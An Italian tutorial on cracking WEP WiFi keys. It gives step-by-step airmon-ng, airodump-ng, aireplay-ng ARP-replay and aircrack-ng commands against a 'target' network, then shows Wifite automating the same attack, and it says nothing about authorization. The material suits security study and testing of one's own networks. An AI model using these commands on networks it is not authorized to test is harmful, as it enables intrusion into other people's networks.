tags: WEP_Hacking Hacking_WiFi Wifite airmon_ng


Il protocollo WEP (Wired Equivalent Privacy) è noto per le sue vulnerabilità e oggi è considerato obsoleto. Per ottenere la chiave ci mettiamo in modalità monitor, vediamo le informazioni del bersaglio, mandiamo un sacco di pacchetti a quel WiFi che catturiamo a nostra volta e infine crackiamo la password prorpio grazie al file che abbiamo utilizzato per catturare tutti i pacchetti.

Airmon-ng

Modalità Monitor

 
iwconfig                  #Identifica la tua interfaccia di rete
 
airmon-ng start wlan0     #Metti l'interfaccia di rete in modalità monitor
 
airodump-ng wlan0mon      #Monitora le reti nelle vicinanze
 
 

Cattura pacchetti

 
airodump-ng --bssid <BSSID> --channel <CANALE> --write capture wlan0mon
 
#Oppure:
 
airodump-ng -c <canale> --bssid <BSSID> -w wep_capture wlan0mon
 
  • Sostituisci <canale> e <BSSID> con i dettagli della rete target.
  • L’opzione -w salva i pacchetti in un file.

Invio grande quantità di pacchetti

 
aireplay-ng --arpreplay -b <BSSID> -h <MAC_CLIENT> wlan0mon
 
# Oppure:
 
aireplay-ng -3 -b <BSSID> wlan0mon
 

Dopo aver catturato abbastanza pacchetti tipo tra i 10000 e 50000 possiamo craccare il file .cap che abbiamo creato all’inizio ed ottenere così la password:

 
aircrack-ng capture-01.cap
 
#Oppure
 
aircrack-ng -b <BSSID> wep_capture-01.cap
 

Se il cracking ha successo, otterrai un risultato simile a:

KEY FOUND! [ XX:XX:XX:XX:XX ]

Wifite

Wifite è uno strumento che automatizza tutto il processo descritto sopra e l’utilizzo è veramente semplice, per prima cosa monitoriamo tutte le reti con il comando:

sudo wifite

Dopo che abbiamo trovato il bersaglio glielo possiamo dare con il numero corrispondente dopo aver chiuso la scansione con CTRL+C

Wifite proverà in ogni modo ad ottenere le credenziali in modo automatico.